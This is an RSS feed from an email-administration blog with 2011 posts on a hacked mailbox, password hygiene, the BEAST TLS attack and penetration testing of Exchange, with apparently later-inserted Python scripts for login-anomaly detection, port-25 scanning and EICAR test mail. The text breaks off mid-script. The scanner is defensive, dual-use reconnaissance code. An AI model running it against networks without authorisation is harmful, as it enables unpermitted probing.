<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Email management, storage and security for business email admins &#187; password protection</title>
	<atom:link href="http://www.theemailadmin.com/tag/password-protection/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.theemailadmin.com</link>
	<description></description>
	<lastBuildDate>Fri, 10 Feb 2012 14:00:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Yes, My Email Account Was Compromised</title>
		<link>http://www.theemailadmin.com/2011/12/yes-my-email-account-was-compromised/</link>
		<comments>http://www.theemailadmin.com/2011/12/yes-my-email-account-was-compromised/#comments</comments>
		<pubDate>Wed, 21 Dec 2011 14:00:26 +0000</pubDate>
		<dc:creator>Jeff Orloff</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[email account hacked]]></category>
		<category><![CDATA[Email address]]></category>
		<category><![CDATA[email management]]></category>
		<category><![CDATA[Mail]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[MSN]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[User (computing)]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=5106</guid>
		<description><![CDATA[This morning I noticed the flashing red light on my Blackberry alerting me to a new message. Since this device is connected to my work email account, I decided to give it a look to see what was so important that it couldn’t wait until Monday. I was lucky that I did check it. The [...]<p><a href="http://www.theemailadmin.com/2011/12/yes-my-email-account-was-compromised/">Yes, My Email Account Was Compromised</a><br/><br/>

Free ebook download: <a href="http://www.theemailadmin.com/ebook/Top-10-Most-Popular-Troubleshooting-Posts-for-Email-Administrators.pdf">Top 10 Most Popular Troubleshooting Posts for Email Administrators</a></p>
]]></description>
			<content:encoded><![CDATA[
<p><a href="http://www.theemailadmin.com/wp-content/uploads/2011/12/email-accounts-hacked.jpg"><img class="alignright size-full wp-image-5107" src="http://www.theemailadmin.com/wp-content/uploads/2011/12/email-accounts-hacked.jpg" alt="" width="281" height="210" /></a>This morning I noticed the flashing red light on my Blackberry alerting me to a new message. Since this device is connected to my work email account, I decided to give it a look to see what was so important that it couldn’t wait until Monday.</p>
<p>I was lucky that I did check it. The new message was actually from my personal email account and the contents of the message contained only one link and other people were also sent the same message.</p>
<p>I realized immediately that my personal email account was sending spam. I was upset with this because working with email and security, I write and train others on best practices. Not only this, but I follow them as well. I make sure that:</p>
<ul>
<li>I use strong passwords and phrases</li>
<li>I change my passwords frequently</li>
<li>I don’t use the same password over and over</li>
<li>I update my anti-malware software regularly</li>
<li>I run anti-malware scans regularly (ironically, I had just run a scan the day before)</li>
<li>I am careful about what sites I visit</li>
<li>I am careful about clicking links in emails</li>
<li>I am careful about what I download, even checking the MD5 hashes when available.</li>
</ul>
<p>However, after I realized what had happened, I didn’t make the classic mistake of denial that this could happen to me. After all, people much smarter than me have had their systems compromised. Driven by a classic saying in computer security, “The only way to ensure that a computer is 100% secure is to unplug it from everything and seal it up in a box,” I moved ahead with fixing the problem.</p>
<h2>Steps taken</h2>
<p>When I opened up my personal email account there were over 100 mail delivery subsystem errors and Out of Office replies waiting for me.</p>
<p>At first I thought that my email address had possibly been spoofed. After all, most of the sites I write for include it as a way to contact me so I am sure it comes up quite often when people are mining the Internet for email addresses.</p>
<p>However, looking at a few of these messages, I noticed that the spam messages were being sent to every address that I had ever sent an email to, not just my contacts. What this said is that:</p>
<p>A) My email address had not been spoofed.</p>
<p>B) It wasn’t malware that was abusing my contact list. This was the result of my account credentials being compromised.</p>
<p>It may appear that the first step anyone should take in this situation is to change the password immediately. Not entirely true.</p>
<p>Most passwords are captured from a keystroke logger installed on your computer. If you go ahead and change your password, you are simply letting the attacker know what your new one is.</p>
<p>Instead, I went ahead and attempted to update all of my anti-malware definitions. Since I had just run a scan the day before, there was nothing to update. The next step was to run all of these scans again.</p>
<p>The three scans from Malwarebytes Anti-Malware, TDSSKiller Antirootkit utility and Ad-Aware all came up clean, so I went ahead and changed the password on my account. Even after I changed the password, more delivery error messages came up, but looking at the headers, these were delayed, as the original messages sent from my account went out between 6:48 AM and 6:54 AM, so everything looked clean.</p>
<h2>Digging deeper</h2>
<p>Once I was sure that everything was cleaned up, curiosity got the better of me and I decided to look a bit deeper into the emails that were being sent out from my address.</p>
<p>To make sure I didn’t infect my computer once again, I created a virtual machine and loaded it up with my three favorite anti-malware tools and ran a scan using each just to ensure the new “computer” was clean.</p>
<p>Then I clicked on the link just to see where it went. Of course, the link was spoofed and redirected to cretep.ru registered out of Russia advertising for an herbal Viagra clone, Viagrow. Of course, by their claims it had been featured in Men’s Health, Maxim, MSN, Esquire and other media outlets.</p>
<p>After closing out the site, I fired up all of the anti-malware software to see what really happened when I visited this site. The first scan found two installations of PUP.FunWebProducts and one installation of Adware.MyWebSearch.</p>
<p>Even as the so-called experts when it comes to email, we have to realize that as threats escalate in sophistication we too are vulnerable. Following the best practices and taking the proper measures to secure our email accounts certainly help, but there is no way that any of us can assume that our accounts are 100% safe.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/12/yes-my-email-account-was-compromised/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Google States What Needs To Be Said</title>
		<link>http://www.theemailadmin.com/2011/11/google-states-what-needs-to-be-said/</link>
		<comments>http://www.theemailadmin.com/2011/11/google-states-what-needs-to-be-said/#comments</comments>
		<pubDate>Wed, 30 Nov 2011 16:00:23 +0000</pubDate>
		<dc:creator>Casper Manes</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=5009</guid>
		<description><![CDATA[How about a quick show of hands? How many of you, reading this, administer a corporate email system? Hmmm, looks like practically all of you, except for that guy in the back of the corner wearing the yellow t-shirt. Okay, not sure why you’re here, but I appreciate you reading nonetheless. Okay, next question. How [...]
]]></description>
			<content:encoded><![CDATA[
<p><a href="http://www.theemailadmin.com/wp-content/uploads/2011/11/largeNewGoogleLogoFinalFlat-a.png"><img class="size-medium wp-image-5026 alignright" style="border-width: 0px; border-color: black; border-style: solid; margin: 10px;" title="Google-logo" src="http://www.theemailadmin.com/wp-content/uploads/2011/11/largeNewGoogleLogoFinalFlat-a-300x116.png" alt="" width="270" height="104" /></a>How about a quick show of hands? How many of you, reading this, administer a corporate email system? Hmmm, looks like practically all of you, except for that guy in the back of the corner wearing the yellow t-shirt. Okay, not sure why you’re here, but I appreciate you reading nonetheless. Okay, next question. How many of you have a password policy that makes you change your corporate password every month, for example?</p>
<p>You hear that? That’s the sound of crickets chirping as practically each and every one of you tries to avoid eye contact with everyone else, because most of you probably haven’t changed the password to your personal email account since you first set it up. Now consider how many things are tied to that email account. Password resets for your bank accounts, your credit card accounts, your Facebook, Twitter, and blog accounts; personal email accounts are treasure troves of information for attackers. A compromised personal email account is the perfect information source for an ongoing attack against a user because so many other accounts can be compromised without the victim being aware. And the majority of users will not change their password unless a system prompts them to.</p>
<p>Which is why Google has started a campaign to get users of its popular Gmail service to start changing their password. A new banner will appear at the top of the Gmail web page on accounts with passwords that haven’t been changed in an unspecified, but likely long, time.</p>
<p style="text-align: center;"><a href="http://www.theemailadmin.com/wp-content/uploads/2011/11/Google.png"><img class="aligncenter size-full wp-image-5010" src="http://www.theemailadmin.com/wp-content/uploads/2011/11/Google.png" alt="" width="519" height="37" /></a></p>
<p>The link takes users to a page that offers advice for good password management, including</p>
<ol>
<li>Using a unique password for each unique account.</li>
<li>Using a complex password.</li>
<li>Advice for creating a password that is difficult to guess.</li>
<li>Updating password recovery information, and</li>
<li>Tips for storing passwords when your memory just isn’t good enough.</li>
</ol>
<p>And after all, with dozens if not a hundred or more unique accounts, who can keep unique passwords for each and every account in their head?</p>
<p>Google has also led the industry by offering two factor authentication to users at no charge, using SMS messages to their cell phones to provide the second factor, and offers it as an additional way to secure accounts on this same page. Whether you choose to take advantage of this or not, or even whether or not you use Gmail, changing your password for your personal email account is something that is probably long overdue.</p>
<p>They even included a pretty good, very short, video that talks about how to create strong passwords. It lasts less than a minute, is easy for non-techies to follow, and is completely neutral. <a target="_blank" href="http://www.youtube.com/embed/0RCsHJfHL_4">Here is a link to that video</a>. As soon as you have changed your password, write up a nice little blurb to include in your weekly security tips to your users, reminding them to change the password on their personal accounts too. Remember this bit of security advice my dentist taught me years ago:</p>
<blockquote><p>&#8220;passwords are like toothbrushes; you don’t want to share them with anyone, and you need to change them often.&#8221;</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/11/google-states-what-needs-to-be-said/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Keep Calm and Carry On</title>
		<link>http://www.theemailadmin.com/2011/09/keep-calm-and-carry-on/</link>
		<comments>http://www.theemailadmin.com/2011/09/keep-calm-and-carry-on/#comments</comments>
		<pubDate>Wed, 28 Sep 2011 14:00:15 +0000</pubDate>
		<dc:creator>Casper Manes</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[email encryption]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=4634</guid>
		<description><![CDATA[&#60;sarcasm&#62; Okay, sit down, I have some shocking news for you. TLS has been hacked, broken, smashed to bits. The technology that secures almost all of the secure Internet traffic we rely upon daily has been cracked. We’re all doomed, our bank accounts are going to be plundered, and ecommerce will come to an end. [...]
]]></description>
			<content:encoded><![CDATA[
<p><a href="http://www.theemailadmin.com/wp-content/uploads/2011/09/keepcalmandcarryon.jpg"><img class="alignright size-full wp-image-4637" style="border-width: 0px; border-color: black; border-style: solid; margin: 10px;" src="http://www.theemailadmin.com/wp-content/uploads/2011/09/keepcalmandcarryon.jpg" alt="" width="190" height="266" /></a><em><strong>&lt;sarcasm&gt;</strong></em> Okay, sit down, I have some shocking news for you. TLS has been hacked, broken, smashed to bits. The technology that secures almost all of the secure Internet traffic we rely upon daily has been cracked. We’re all doomed, our bank accounts are going to be plundered, and ecommerce will come to an end. We might just as well all return to the trees; we made a good go of it, but society as we know it is done.<em><strong>&lt;/sarcasm&gt;</strong></em></p>
<p>In all seriousness though, the latest blow to the technologies that help to secure significant amounts of traffic on the Internet was delivered this week by Thai Duong and Juliano Rizzo, two security researchers who plan to demonstrate proof of concept code at the Ekoparty Security Conference in Buenos Aires, Argentina, that can actually decrypt TLS 1.0 traffic. It is a proof of concept, not a zero day exploit already developed into a Metasploit plug-in, so there’s no need to panic quite yet.</p>
<p>TLS 1.0 is one of the most commonly used encryption protocols for securing traffic, including HTTPS, SMTP/TLS, and secure versions of POP3 and IMAP. We use it whenever our clients access our email servers using any secure protocol including web mail, and when we send TLS protected mail between our systems and our partners.</p>
<p><a target="_blank" href="http://www.ietf.org/rfc/rfc2246.txt">Defined in RFC 2246</a>, it was proposed as a replacement for SSL 3.0, which is actually still widely used today. TLS 1.0 is a cipher-block chaining protocol, where a block of plaintext is XOR’d with the block of ciphertext that precedes it. BEAST uses a type of cryptologic attack called a “known plain-text” attack to figure out the encryption, exploiting a vulnerability in TLS 1.0 that has long been theorized as a problem with the protocol.</p>
<p>TLS 1.1 and 1.2 both exist as successors to TLS 1.0, and neither is vulnerable to this same flaw, but they have not been widely implemented, in part because the flaw in 1.0 wasn’t real, at least, not until now. Internet Explorer can use both, but they must be enabled. SChannel in Windows 2008 and 2008 R2 can use them as well, but again, they must be enabled. The easiest way to do this domain-wide for Windows users is to use a group policy to enable &#8220;System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing&#8221;, but don’t do that just yet. This can have some undesirable effects on a typical PC. <a target="_blank" href="http://support.microsoft.com/kb/811833">Read this KB article</a> and test carefully before making a system-wide change like this, and then keep in mind that Chrome, Firefox, and most other browsers cannot use TLS 1.1 or 1.2 at the time of this writing. Even with Windows software, this setting is advisory only. It enables them to use TLS 1.1 and 1.2, but it doesn’t force them to. Many websites using HTTPS only implement TLS 1.0, and clients will be able to fall back to that.</p>
<p>The duo’s proof of concept application is called BEAST, for Browser Exploit Against SSL/TLS, and apparently does a very effective job of decrypting authentication cookies used by websites to grant users access to secured content that requires authentication. Apparently the attack works like this: a bit of JavaScript is injected into a user’s browser session when they visit a compromised website or click on a link that takes them to a site set up to deliver the code; it then works with a network sniffer to capture encrypted cookies passed between the client and a server, which it is then able to decrypt.</p>
<p>To exploit a system, an attacker must first deliver the JavaScript to the browser, and then must have a sniffer in place to capture the packets. A well patched system, running current antivirus, and protected by mechanisms like a proxy server, should be difficult to attack. If an attacker can do all of that to a user, they can probably do anything else they want already, which means they probably already own the victim’s computer.</p>
<p>The good news is that the exploit for this vulnerability, and the proof of concept application, were both developed by good guys. By demonstrating that this sort of attack is possible and practical, it will likely motivate developers of browsers and web servers to deploy TLS 1.1 and 1.2 capable versions of their software. Google has already released a patch that, while still using TLS 1.0, defeats this particular attack, and the developers of OpenSSL and the Network Security Services libraries now have real reasons to implement the stronger protocols.</p>
<p>So, what can be done to help mitigate this? Follow the points below:</p>
<ol>
<li>Keep up-to-date on all vendor patches, both for your operating system and all applications you use.</li>
<li>Keep antivirus software up-to-date, use real-time scans, and perform scheduled full scans regularly.</li>
<li>Close all browser sessions, and use a fresh session with no other open tabs whenever you need to browse to a secure site, like your bank, credit card, webmail, etc.</li>
<li>Close that browser completely when you log off.</li>
<li>Consider disabling JavaScript in your browser.</li>
<li>Consider using a sandboxed version of a browser.</li>
<li>Watch for, and implement, updated libraries for encryption as soon as they are available from your vendors.</li>
</ol>
<p>In researching for this article, I came across a handy website that can show you just which protocols your browser uses to secure an HTTPS session. It uses a self-signed certificate, so be ready to get a warning dialog, but check out <a target="_blank" href="https://www.mikestoolbox.net/">https://www.mikestoolbox.net/</a> to see some interesting information about your browser, and to test any changes you make to supported encryption protocols.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/09/keep-calm-and-carry-on/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Tips for Better Email Security</title>
		<link>http://www.theemailadmin.com/2011/06/tips-for-better-email-security/</link>
		<comments>http://www.theemailadmin.com/2011/06/tips-for-better-email-security/#comments</comments>
		<pubDate>Mon, 27 Jun 2011 16:34:23 +0000</pubDate>
		<dc:creator>Jeff Orloff</dc:creator>
				<category><![CDATA[Compliance]]></category>
		<category><![CDATA[Email archiving & storage]]></category>
		<category><![CDATA[email security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[ediscovery]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[email archiving]]></category>
		<category><![CDATA[email compliance]]></category>
		<category><![CDATA[email encryption]]></category>
		<category><![CDATA[email management]]></category>
		<category><![CDATA[email policies]]></category>
		<category><![CDATA[email servers]]></category>
		<category><![CDATA[email storage]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[phishing]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=4216</guid>
		<description><![CDATA[Most email administrators consider security to be a large part of what they do. With so many laws and regulations governing the storage, discovery and retrieval of email messages, security has become a second job to many. Unfortunately, many administrators either forget, or simply aren’t aware, that securing email requires much more effort than hardening [...]
]]></description>
			<content:encoded><![CDATA[
<div id="attachment_4217" class="wp-caption alignright" style="width: 235px"><img class="size-medium wp-image-4217 " style="margin: 10px; border: black 0px solid;" src="http://www.theemailadmin.com/wp-content/uploads/2011/06/advanced-persistent-threat-225x300.jpg" alt="Advanced persistent threats make email security a necessity" width="225" height="300" /><p class="wp-caption-text">Advanced persistent threats make email security a necessity</p></div>
<p>Most email administrators consider security to be a large part of what they do. With so many laws and regulations governing the storage, discovery and retrieval of email messages, security has become a second job to many.</p>
<p>Unfortunately, many administrators either forget, or simply aren’t aware, that securing email requires much more effort than hardening the email servers against attack. In order to fully protect your organization’s email and its contents, the mailbox also needs to be defended. This is especially true when you consider how popular Advanced Persistent Threats are becoming with large cyber crime syndicates, who use email not only as a way to harvest sensitive information, but also as a method of attack through phishing and social engineering.</p>
<p>By implementing the following tips into your security plan you can help protect against these, and the many other threats that your organization may face:</p>
<p><strong>Create email policies to regulate the communication of confidential information</strong></p>
<p>Email communication has become second nature in the workplace. It is quick, easy and it gives us a record of our conversation so we can refer back to any information at a later date. However, if the conversation contains sensitive information like login credentials, financials, personal information, and the like, then it can be extremely valuable to anyone who may harvest those emails.</p>
<p>By simply setting up, and enforcing, policies that restrict certain information from being sent via email you can mitigate the damage done if emails are exposed. At the very least, your policy should state that user logins and passwords (and/or PINs) not be communicated via email.</p>
<p><strong>Teach users to encrypt their messages</strong></p>
<p>One of the best analogies I have seen to describe the need for encrypting emails is one that compares email to a postcard. Basically, anyone who comes across it can read the contents if they want. This can be stopped by encrypting emails to prevent eavesdropping.</p>
<p>Encryption is a hard thing for many people. It requires additional steps, training and, in some cases, third-party software (such as PGP) yet it is really the only way to keep your messages private in transit.</p>
<p>Encryption shouldn’t be limited to sending and receiving messages alone. Any email that is stored on a hard drive (think personal folders), a network drive, backup servers or archive systems should also be protected from any prying eyes.</p>
<p><strong>Get rid of old email</strong></p>
<p>A long time ago, storage space was a precious resource. Nowadays inboxes can be easily scaled to hold enormous amounts of data. Unfortunately that provides a greater possibility that an attacker will find something valuable.</p>
<p>Emails should be moved, or deleted, when their life cycle is up. Make sure to check any regulations regarding discovery and archiving before getting rid of the old stuff, but if you combine this with encryption you will be taking great strides to protect older emails.</p>
<p><strong>Practice good network security habits</strong></p>
<p>Make sure that desktops are continually scanned for malware that could expose email login credentials, filter Internet content to protect against malicious websites, understand how to properly use a firewall, and keep server and client software patched.</p>
<p>In addition to employing technology to help secure your email systems, you should also consider the human factor. One of the ways people first discover that a system has been compromised is by noticing an anomaly. Be on the lookout for logins that just don't seem right, whether it is the source IP address, the time of day, the length of the session or a run of failed attempts followed by a success.</p>
<p>Reviewing login activity is one of the most tedious tasks in security, but it is by far the most important, and it is the one most worth automating.</p>
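<p>The anomalies described above can be picked out automatically. The script below is an added example, not part of the original article: it reads a constructed login log in an invented one-line-per-attempt format (adapt <code>parse_line</code> to whatever your server actually writes) and raises two kinds of finding: a successful login from an address the user has never used before, outside working hours, and a success that follows a burst of failures from the same address. The working-hours range and the burst size are assumptions to tune for your own workforce.</p>

```python
"""Flag anomalous mailbox logins in a simple authentication log.

Added example, not from the original article. The log format is a
constructed one for illustration (ISO-8601 UTC timestamp, user, client IP,
result); adapt parse_line() to your own server's logs.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+ip=(?P<ip>\S+)\s+result=(?P<result>\S+)$"
)

# Assumptions for the example: hours (UTC) in which a login from a
# never-before-seen address is unremarkable, and how many consecutive
# failures from one address count as a guessing run.
WORK_HOURS = range(7, 20)
FAIL_BURST = 5

# Constructed sample log, not real data.
SAMPLE_LOG = """\
2011-12-19T08:55:10Z user=alice ip=10.1.4.22 result=success
2011-12-19T09:02:31Z user=bob ip=10.1.4.31 result=success
2011-12-19T17:40:02Z user=alice ip=10.1.4.22 result=success
2011-12-20T03:12:44Z user=alice ip=203.0.113.9 result=success
2011-12-20T10:00:01Z user=bob ip=198.51.100.7 result=failure
2011-12-20T10:00:02Z user=bob ip=198.51.100.7 result=failure
2011-12-20T10:00:03Z user=bob ip=198.51.100.7 result=failure
2011-12-20T10:00:04Z user=bob ip=198.51.100.7 result=failure
2011-12-20T10:00:05Z user=bob ip=198.51.100.7 result=failure
2011-12-20T10:00:06Z user=bob ip=198.51.100.7 result=success
2011-12-20T11:15:00Z user=carol ip=10.1.4.40 result=success
"""


def parse_line(line):
    """Return (timestamp, user, ip, result) or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["user"], m["ip"], m["result"]


def find_anomalies(log_text):
    """Return [(timestamp, user, ip, reason), ...] in log order."""
    seen_ips = defaultdict(set)     # user -> addresses that logged in before
    fail_streak = defaultdict(int)  # (user, ip) -> consecutive failures so far
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, user, ip, result = rec
        key = (user, ip)
        if result != "success":
            fail_streak[key] += 1
            continue
        if fail_streak[key] >= FAIL_BURST:
            findings.append((ts, user, ip, "success after %d failures" % fail_streak[key]))
        # A first-ever login establishes the baseline and is not flagged.
        if ip not in seen_ips[user] and seen_ips[user] and ts.hour not in WORK_HOURS:
            findings.append((ts, user, ip, "new address outside working hours"))
        fail_streak[key] = 0
        seen_ips[user].add(ip)
    return findings


if __name__ == "__main__":
    for ts, user, ip, reason in find_anomalies(SAMPLE_LOG):
        print(ts.isoformat(), user, ip, reason)
```

<p>Run on the sample, it reports alice's 03:12 login from 203.0.113.9 and bob's success after five failures; bob's own new address is not flagged on its own because it arrived during working hours. Both rules are deliberately simple; the value is in running them every day rather than in their sophistication.</p>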
<p><strong>Put the right solutions in place</strong></p>
<p>In many small and medium-sized enterprises, the email administrator alone cannot be as vigilant as he or she would like. Even organizations with a team of professionals dedicated to security rely on tooling to do the job; smaller companies need to understand this as well.</p>
<p>By employing technologies that help manage email, backup and recovery, archiving and security, you are plugging the little holes that provide that chink in the armor most attackers are looking for.</p>
<p>No one said that email security is going to be an easy task, but it is one that cannot be ignored just because it&#8217;s too hard or it costs too much.</p>
<span id="pty_trigger"></span><p><a href="http://www.theemailadmin.com/2011/06/tips-for-better-email-security/">Tips for Better Email Security</a><br/><br/>

Free ebook download: <a href="http://www.theemailadmin.com/ebook/Top-10-Most-Popular-Troubleshooting-Posts-for-Email-Administrators.pdf">Top 10 Most Popular Troubleshooting Posts for Email Administrators</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.theemailadmin.com/2011/06/tips-for-better-email-security/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Simple Penetration Testing Strategies for Your Exchange Server</title>
		<link>http://www.theemailadmin.com/2011/06/simple-penetration-testing-strategies-for-your-exchange-server/</link>
		<comments>http://www.theemailadmin.com/2011/06/simple-penetration-testing-strategies-for-your-exchange-server/#comments</comments>
		<pubDate>Fri, 24 Jun 2011 16:41:18 +0000</pubDate>
		<dc:creator>Paul Mah</dc:creator>
				<category><![CDATA[email security]]></category>
		<category><![CDATA[Exchange server]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[password protection]]></category>
		<category><![CDATA[passwords]]></category>

		<guid isPermaLink="false">http://www.theemailadmin.com/?p=4185</guid>
		<description><![CDATA[The recent spike in security breaches resulting from meticulously planned and executed spear phishing attacks may have forced email administrators to start thinking of topics that they may never have considered previously, such as the repercussion of a hacked Exchange Server account, or the reasons why hackers would be interested in attacking your email server.  [...]
]]></description>
			<content:encoded><![CDATA[
<p><img class="size-full wp-image-4184 alignright" style="margin: 10px; border: black 0px solid;" src="http://www.theemailadmin.com/wp-content/uploads/2011/06/Penetration.jpg" alt="Brick Wall" width="250" height="250" />The recent spike in security breaches resulting from meticulously planned and executed spear phishing attacks may have forced email administrators to start thinking of topics that they may never have considered previously, such as the <a href="http://www.theemailadmin.com/2011/05/5-repercussions-of-a-hacked-exchange-server-account/">repercussion of a hacked Exchange Server account</a>, or the <a href="http://www.theemailadmin.com/2011/03/5-reasons-why-hackers-want-to-break-into-your-email-server/">reasons why hackers would be interested in attacking your email server</a>.  Indeed, you may have already read <a href="http://www.theemailadmin.com/2011/03/securing-your-microsoft-exchange-2010-server/">Securing Your Microsoft Exchange 2010 Server</a>, and have duly implemented the various hardening measures that I&#8217;ve linked to in that article. <span id="more-4185"></span></p>
<p>Moving ahead, though, you may be wondering whether your Exchange Server is truly protected against malicious attacks.  Beyond waiting for a hacker to break in, is there anything the diligent administrator can do to reduce the chances of a successful break-in?  I had the opportunity to <a target="_blank" href="http://www.thetechblogger.com/2011/04/attending-certified-ethical-hacker-cehv7/">attend an EC-Council Certified Ethical Hacker course recently</a>, and one indelible lesson I gained was how proper penetration tests lead to better security.  The rationale is simple &#8211; if you can break in, then so can an attacker.  Today, I want to highlight some very simple penetration testing strategies that cash-strapped businesses can perform on their Exchange Servers to get a better pulse on their security readiness.</p>
<p>Obviously, permission must first be obtained from the relevant management prior to any penetration testing &#8211; preferably in writing, with the scope and time window spelled out.  Also, the usual caveat about the dangers of tinkering with malware applies, and there is the very real possibility of Trojans hidden inside "hacker tools" downloaded from unofficial sources, so fetch tools from their project sites and verify checksums.  Finally, I would strongly advocate hiring a properly qualified and professional penetration testing team, which has the added benefit of a detailed report on any findings with recommendations for improvements.</p>
<p><strong>Port scan</strong></p>
<p>One of the simplest ways to look for malware or illicit server software is a port scan of your Exchange Server.  Simplistic as it is, this is one of the first steps an attacker performs when targeting your organization, and it can reveal flawed configurations or the presence of unwanted (and forgotten) services.  Compare what is listening against what the server is supposed to expose (for example SMTP on 25 and 587 and HTTPS on 443, with POP3 and IMAP4 only if you have actually enabled them) and account for every port that is not on that list.</p>
<p>An extension of this idea is to scan your internal network for SMTP (port 25) listeners.  A listener on a workstation can indicate unauthorized software or a zombie machine running spamming software, and any listener that is not the sanctioned mail server should be explained or removed.  A basic and very well-known network and security scanner is the free <a target="_blank" href="http://nmap.org/">Nmap</a>, though many commercial scanners can do more detailed work such as detecting common misconfigurations.</p>
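<p>A small scanner for that internal-network SMTP check, as an added example that is not part of the original article: it is a stand-in for <code>nmap -p25 --open 10.1.4.0/24</code>, connecting to port 25 on every host in a range and recording the greeting each listener sends. The address range in <code>main</code> is an assumption; the banner parser is kept separate so it can be reused on output from a real scanner.</p>

```python
"""Find hosts answering on the SMTP port across an internal range and record
what they say. Added example, not from the original article; a lightweight
stand-in for `nmap -p25 --open <range>`. The range in main() is an
assumption. Anything that answers on port 25 and is not the sanctioned
mail server needs an explanation.
"""
import ipaddress
import re
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_smtp_banner(banner):
    """Split an SMTP greeting into (code, hostname, software text).

    RFC 5321 greeting: "220 <domain> [text]". A non-220 reply (e.g. 554 from
    a server refusing service) is still a listener, so it is returned too,
    with the whole text and no hostname.
    """
    m = re.match(r"^(\d{3})[ -]\s*(.*)$", banner.strip())
    if not m:
        return None
    code, text = int(m.group(1)), m.group(2).strip()
    if code != 220:
        return code, "", text
    host, _, rest = text.partition(" ")
    return code, host, rest.strip()


def grab_banner(ip, port=25, timeout=2.0):
    """Return the first greeting line from ip:port, "" if it accepts the
    connection but sends nothing usable, or None if nothing is listening."""
    try:
        s = socket.create_connection((ip, port), timeout=timeout)
    except OSError:
        return None
    with s:
        try:
            data = s.recv(512)
        except OSError:  # timeout or reset after connecting: still a listener
            return ""
    return data.decode("ascii", "replace").split("\r\n")[0]


def scan_for_smtp(network, port=25, workers=64):
    """Yield (ip, banner) for every host in the CIDR `network` that accepts
    a TCP connection on `port`."""
    hosts = [str(h) for h in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda h: grab_banner(h, port), hosts)
        for ip, banner in zip(hosts, results):
            if banner is not None:
                yield ip, banner


if __name__ == "__main__":
    import sys
    network = sys.argv[1] if len(sys.argv) > 1 else "10.1.4.0/24"  # assumed range
    for ip, banner in scan_for_smtp(network):
        print(ip, parse_smtp_banner(banner) or "(no banner)")
```

<p>The greeting is worth keeping: a Microsoft ESMTP banner on the Exchange server is expected, while a Postfix, Sendmail or unnamed listener on a desktop subnet is exactly the kind of forgotten or unauthorized service the scan is meant to surface.</p>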
<p><strong>Sending malware to yourself</strong></p>
<p>An easy way to test the capability of your malware filter or gateway antivirus scanner is to deliberately send "malware" to an account on your server.  Rather than handling live samples, use the EICAR test file, a harmless 68-byte string that antivirus products detect by convention, and package it the way spammers and attackers do: as a bare executable-looking attachment, inside an archive, inside a nested archive, or alongside a malformed PDF or Word document if you have a safe sample of one.  Administrators should take pains to send such attachments only to unused accounts or one set aside for testing, and to warn whoever watches the gateway alerts beforehand.</p>
<p>It should also be noted that many recent attacks rely on phishing or social engineering that pushes users into clicking a link to a malware-laden website rather than on sending malware as an attachment, so a clean result on attachment filtering says nothing about your URL filtering or your users.</p>
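<p>A builder for those test messages, as an added example that is not part of the original article. It attaches the standard EICAR test string in three packagings (bare, zipped and zipped inside a zip) and hands the result to the relay; the sender, the sink mailbox and the relay host in <code>main</code> are assumptions, and the mailbox should be one set aside for this purpose.</p>

```python
"""Build gateway test messages carrying the EICAR anti-virus test file.

Added example, not from the original article. EICAR is the harmless 68-byte
string that anti-virus products detect by convention, so it exercises the
filter without anyone handling real malware. The variants mirror common
attacker packaging: the bare file, the file inside a zip, and inside a zip
inside a zip. The sender, the test mailbox and the relay host in main() are
assumptions; send only to a mailbox set aside for this.
"""
import io
import smtplib
import zipfile
from email.message import EmailMessage

# The standard EICAR test string (exactly 68 bytes).
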